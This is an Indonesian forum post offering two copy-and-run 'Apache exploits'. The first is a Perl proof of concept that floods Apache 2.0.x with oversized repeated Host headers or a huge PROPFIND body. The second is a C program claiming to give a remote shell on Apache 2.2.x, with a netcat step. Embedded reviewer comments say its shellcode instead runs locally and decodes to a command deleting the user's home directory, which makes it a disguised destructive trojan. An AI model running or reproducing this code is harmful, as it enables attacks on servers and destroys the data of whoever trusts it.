| Exploit Apache 2.0.37-2.2.11 | |
digitalcat BC Security
| Subyek: Exploit Apache 2.0.37-2.2.11 Tue May 01, 2012 8:28 pm | |
| Exploit Apache 2.0.37 - 2.0.45 By Matthew Murphy [Perl] Gunakan ActivePerl 5.8.x. Cukup masukkan IP address, port, username, dan password yang diinginkan. Code Copy paste save as->Apache2.0.pl : - Code:
#!/usr/bin/perl
#
# Apache 2.0.37 - 2.0.45 APR Exploit
# Written By Matthew Murphy
#
# Interactive proof-of-concept, reproduced as posted. It reads a host, a
# port and optional credentials from STDIN, opens one TCP connection, sends
# a single HTTP request whose "Host:" header is repeated ten times with a
# 2000-byte value (or, for the DAV variant, a PROPFIND whose XML namespace
# URI is 20000 bytes long), and echoes the raw response to STDOUT. The
# targeted releases are long end-of-life.
#
# Defender notes:
#   - The request shape is the observable: ten 2000-byte "Host:" headers,
#     or a ~20 KB XML body on PROPFIND. Current Apache releases and any
#     front-end proxy/WAF with per-header and body size limits should
#     reject this outright, and it stands out in request logs.
#   - The script shells out to an external base64 encoder and interpolates
#     the typed credentials into that command line (2-arg pipe open below),
#     so it is also a command-injection footgun on the machine running it.

# Template for the external base64 command; "%s" receives "user:pass".
# The posted value is a placeholder and is never filled in here.
$BASE64_CMD_STRING = "use_base64_encoder_here %s";
$BASE64_USE_STDIN = 0;   # 1 = drive the encoder through pipes (author calls that path alpha)
$BASE64_WRITE_NL = "";   # assigned but not read anywhere in this listing
use IO::Socket;
print STDOUT "Apache 2.0.37 - 2.0.45 Exploit\r\n";
print STDOUT "By Matthew Murphy\r\n\r\n";
print STDOUT "Enter the hostname/IP address of the server: ";
$line = <STDIN>;
$host = mychomp($line);
print STDOUT "Enter the port of the server \[80\]: ";
$line = <STDIN>;
$port = mychomp($line);
print STDOUT "Use authentication credentials for the session \[Y/N\]? ";
$line = <STDIN>;
$char = mychomp($line);
# NOTE(review): `==` is a numeric comparison; both sides numify to 0, so
# this condition (and the two identical ones below) is always true.
if ($char == "Y" || $char == "y") {
    print STDOUT "What username shall we use: ";
    $line = <STDIN>;
    $user = mychomp($line);
    print STDOUT "What password shall we use: ";
    $line = <STDIN>;
    $pass = mychomp($line);
    $auth = "$user:$pass";
    if ($BASE64_USE_STDIN) {
        # l33t Perl piping trix; NOTE: This is definitely
        # Alpha code! :-)
        # Redirects this process's STDIN/STDOUT onto two pipes, runs the
        # encoder with system(), then restores the handles and feeds $auth
        # through. The dup spellings ("&STDIN", "&>OLDSTDOUT") do not match
        # Perl's "<&"/">&" forms; left exactly as posted.
        pipe(STDOUTREAD, STDOUTWRITE);
        pipe(STDINREAD, STDINWRITE);
        open(OLDSTDIN, "&STDIN");
        open(OLDSTDOUT, ">&STDOUT");
        open(STDIN, "&STDINREAD");
        open(STDOUT, ">&STDOUTWRITE");
        close(STDINREAD);
        close(STDOUTWRITE);
        system($BASE64_CMD_STRING);
        open(STDIN, "&OLDSTDIN");
        open(STDOUT, "&>OLDSTDOUT");
        close(OLDSTDIN);
        close(OLDSTDOUT);
        print STDINWRITE $auth;
        close(STDINWRITE);
        read(STDOUTREAD, $base64, 4096); # Edit for insane passwords
        close(STDOUTREAD);
    } else {
        # 2-arg pipe open: the whole string goes through the shell, with
        # the user-typed "$user:$pass" interpolated into it. Any shell
        # metacharacter in the typed credentials executes locally, and the
        # credentials are visible in the process list while it runs.
        open(READOUTPUT, sprintf($BASE64_CMD_STRING, $auth)."|");
        read(READOUTPUT, $base64, 4096); # See above
        close(READOUTPUT);
    }
    # Drop any spaces the encoder emitted; newlines are left in place.
    $base64 = join("", split(/ /, $base64));
} else {
    $base64 = undef;
}
# As posted this connects to 127.0.0.1 with the default port, not to the
# $host/$port typed above; those only appear in the PROPFIND Host header.
$f = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"127.0.0.1");
print STDOUT "Exploiting a proxy server \[Y/N\]? ";
$line = <STDIN>;
$char = mychomp($line);
if ($char == "Y" || $char == "y") {
    print $f "GET / HTTP/1.1\x0d\x0a";
    # Apache 2.0.37 - 2.0.45 tries to limit header inputs, but uses a hash table
    # that ultimately concatenates multiple headers of the same name
    # together with ", " between them, so:
    #
    # Host: a
    # Host: b
    #
    # Bypasses Apache's buffer size checks, but ends up as:
    #
    # Host: a,b
    #
    # When processed. Confirm this with a TRACE against your server:
    #
    # TRACE / HTTP/1.1
    # Host: a
    # Host: b
    #
    # The "message/http" body you receive will contain:
    #
    # TRACE / HTTP/1.1
    # Host: a,b
    #
    # So, for those of you who are confused by this code fragment,
    # this is what it ultimately achieves!
    for ($i = 0; $i < 10; $i++) {
        print $f "Host: ".("A"x2000)."\r\n";
    }
    if (defined($base64)) {
        print $f "Proxy-Authorization: Basic ".$base64."\r\n";
    }
    print $f "\r\n";
} else {
    print STDOUT "What resource should be probed: ";
    $line = <STDIN>;
    $res = mychomp($line);
    print STDOUT "Exploit a DAV repository for this attack? \[Y/N\] ";
    $line = <STDIN>;
    $char = mychomp($line);
    if ($char == "Y" || $char == "y") {
        # PROPFIND body with a 20000-byte namespace URI.
        $xmlbody = "<?xml version=\"1.0\"?>\r\n";
        $xmlbody.= "<D:propfind xmlns:D=\"".("A"x20000)."\:\">\r\n";
        $xmlbody.= "\x20\x20\x20\x20<D:allprop/>\r\n";
        $xmlbody.= "</D:propfind>";
        # HTTP headers
        print $f "PROPFIND $res HTTP/1.1\r\n";
        print $f "Host: $host:$port\r\n";
        print $f "Depth: 1\r\n";
        print $f "Content-Type: text/xml; charset=\"utf-8\"\r\n";
        # $body is never assigned in this listing (the XML is in $xmlbody),
        # so this header reads "Content-Length: 0" and the blank line ending
        # the headers is emitted here, before the Authorization line below.
        print $f "Content-Length: ".length($body)."\r\n\r\n";
        if (defined($base64)) {
            print $f "Authorization: Basic ".$base64."\r\n";
        }
        print $f "$xmlbody\r\n\r\n";
    } else {
        # This does *almost* the exact same thing as the mod_proxy
        # code, and could be considered wasteful, but a few extra
        # CPU cycles never killed anybody. :-(
        print $f "GET $res HTTP/1.1\r\n";
        for ($i = 0; $i < 10; $i++) {
            print $f "Host: ".("A"x2000)."\r\n";
        }
        if (defined($base64)) {
            print $f "Authorization: Basic ".$base64."\r\n";
        }
        print $f "\r\n";
    }
}
# Echo whatever the server sends back until it closes the connection.
while (defined($ln = <$f>)) {
    print STDOUT $ln;
}
undef $f;
exit;
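# Return a copy of $arg with one trailing line ending removed.
#
# Accepts both "\n" and "\r\n", so the prompt code above behaves the same
# on Unix and Windows, and leaves input with no trailing newline intact.
# The posted version compared `$^O == "MSWin32"` numerically (always
# true) and therefore unconditionally dropped the last character of
# whatever it was given; this version strips only a real line ending.
#
# Returns the stripped string; undef is treated as "". $arg is not modified.
sub mychomp {
    my $arg = shift;
    my $data = defined $arg ? $arg : "";
    $data =~ s/\r?\n\z//;
    return $data;
}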
-------------------------------------------------------------------------- Exploit Apache 2.2.0 - 2.2.11. Compile: - Code:
gcc apache.c
atau
Compile: gcc apache.c -o apache
Penggunaan : - Code:
./a.out <hostname> <port>
atau
./apache <hostname> <port>
Setelah di compile, contoh : - Code:
./apache 127.0.0.1 80
lakukan koneksi dengan netcat di port "12345" Code Copy paste save as->apache.c : - Code:
#include <stdio.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <netdb.h> #include <string.h> #include <unistd.h> #include <stdlib.h>
/* Print the invocation synopsis to stdout and terminate with status 1. */
void usage(char *argv[])
{
    const char *prog = argv[0];
    fprintf(stdout, "Usage: %s <hostname> <port>\n\n", prog);
    exit(1);
}
/*
 * Entry point. Resolves argv[1], connects to it on port argv[2], sends one
 * fixed HTTP/1.0 request, then fork()s and executes the embedded byte
 * string on the LOCAL machine through the function pointer `sc`.
 *
 * NOTE(review): nothing in this program delivers `shellcode` to the server
 * as code -- the `%91s` below merely copies its bytes into a Cache-Control
 * header value -- and nothing opens or connects to port 12345 despite the
 * closing printf. Decoding the bytes by hand, they look like x86 Linux
 * execve("/bin/sh", {"/bin/sh", "-c", "rm -rf ~"}, NULL) via int 0x80,
 * i.e. the payload runs against the account of whoever runs this binary.
 * Confirm with a disassembler; until then read the listing as hostile to
 * its own user rather than as a PoC against the named Apache versions.
 */
int main(int argc,char *argv[]) {
    /* Raw bytes; executed locally in the child process below. */
    char *shellcode=
        "\xb8\xff\x2f\x73\x68\xc1\xe8\x08\x50"
        "\xb8\x2f\x62\x69\x6e\x50\x89\xe3\x31\xc0\x50"
        "\x66\xb8\x71\x71\x66\x35\x51\x51\x66\x50"
        "\xb8\x23\x37\x71\x2f\x35\x51\x51\x51\x51\x50"
        "\xb8\x23\x3c\x71\x7c\x35\x51\x51\x51\x51\x50\x89\xe1\x31\xc0\x50"
        "\x66\xb8\x2d\x63\x66\x50\x89\xe2\x31\xc0\xb0\x64\x29\xc4\x31\xc0\x50\x51\x52\x53"
        "\x89\xe1\x31\xd2\x31\xc0\xb0\x0b\xcd\x80\xb4\x01\x31\xdb\xcd\x80";
    int (*sc)()=(int(*)())shellcode;   /* reinterprets the data bytes as a function */
    char host[100];
    int sd;
    struct sockaddr_in sin;            /* unused */
    struct sockaddr_in pin;
    struct hostent *hp;
    char *evilreq=malloc(4096);        /* return value unchecked; never freed */
    pid_t pid;
    if (argc!=3) usage(argv);
    strcpy(host,argv[1]);              /* unbounded copy of argv[1] into a 100-byte buffer */
    if ((hp = gethostbyname(host)) == 0) {
        perror("gethostbyname");
        exit(2);
    }
    memset(&pin, 0, sizeof(pin));
    pin.sin_family = AF_INET;
    pin.sin_addr.s_addr = ((struct in_addr *)(hp->h_addr))->s_addr;
    pin.sin_port = htons(atoi(argv[2]));
    if ((sd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
        perror("socket");
        exit(1);
    }
    if (connect(sd,(struct sockaddr *) &pin, sizeof(pin)) == -1) {
        perror("connect");
        exit(3);
    }
    printf("Connected,...\n");
    /* "%%s" emits a literal "%s"; "%91s" pads the shellcode bytes to 91
     * columns inside the Cache-Control value. The result is an ordinary
     * GET with odd headers, bare "\n" line endings, no Host header. */
    sprintf(evilreq,"GET / HTTP/1.0\nAccept-Encoding: x-compress; x-zip\nCache-Control: max-age=-12312312%%s%91s\n\n",shellcode);
    if (send(sd, evilreq, strlen(evilreq), 0) == -1) {
        perror("send");
        exit(1);
    }
    printf("Waiting some seconds...\n");
    pid=fork();
    if (pid==0) {
        /* Child: stderr is closed so anything the payload prints is
         * hidden, then the embedded bytes run on THIS host. The server's
         * response is never read. */
        close(2);
        sc();
        exit(0);
    } else {
        sleep(2);
        /* socket() already succeeded, so this check is effectively unconditional. */
        if (sd) {
            /* Nothing in this program listens on 12345. */
            printf("Now type nc %s 12345 \n",argv[1]);
            close(sd);
        }
    }
}